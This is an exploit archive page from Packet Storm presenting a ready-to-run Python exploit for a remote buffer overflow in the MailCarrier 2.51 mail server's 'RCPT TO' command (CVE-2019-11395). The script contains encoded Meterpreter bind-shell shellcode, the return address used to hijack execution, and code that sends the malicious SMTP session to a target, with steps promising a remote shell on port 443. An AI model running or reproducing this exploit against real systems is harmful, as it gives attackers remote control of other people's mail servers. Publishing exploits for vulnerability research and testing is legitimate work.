exploit the possibilities

MailCarrier 2.51 RCPT TO Buffer Overflow

MailCarrier 2.51 RCPT TO Buffer Overflow
Posted Apr 13, 2019
Authored by Dino Covotsos

MailCarrier version 2.51 RCPT TO remote buffer overflow exploit.

tags | exploit, remote, overflow
advisories | CVE-2019-11395
MD5 | 210b4ff9528a1725b8a6e131dd84ae2e

MailCarrier 2.51 RCPT TO Buffer Overflow

Change Mirror Download
#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote)
# Date: 12/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
#0x7e4456f7 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
#POC
#1.) Change ip and port in code
#2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
import sys
import socket
import time

#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e"
"\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70"
"\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44"
"\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f"
"\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49"
"\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72"
"\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e"
"\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51"
"\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32"
"\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b"
"\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64"
"\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53"
"\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72"
"\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b"
"\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e"
"\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44"
"\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79"
"\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b"
"\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52"
"\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c"
"\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67"
"\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48"
"\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46"
"\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a"
"\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79"
"\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39"
"\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b"
"\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45"
"\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59"
"\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61"
"\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62"
"\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64"
"\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69"
"\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b"
"\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65"
"\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43"
"\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76"
"\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f"
"\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47"
"\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b"
"\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69"
"\x6f\x58\x55\x41\x41")

buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100

print "[*] Sending pwnage buffer: with %s bytes" %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 25))
print s.recv(1024)
s.send('EHLO root@telspace.co.za \r\n')
print s.recv(1024)
s.send('MAIL FROM: pwnz@telspace.co.za \r\n')
print s.recv(1024)
s.send('RCPT TO: '+ buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    6 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close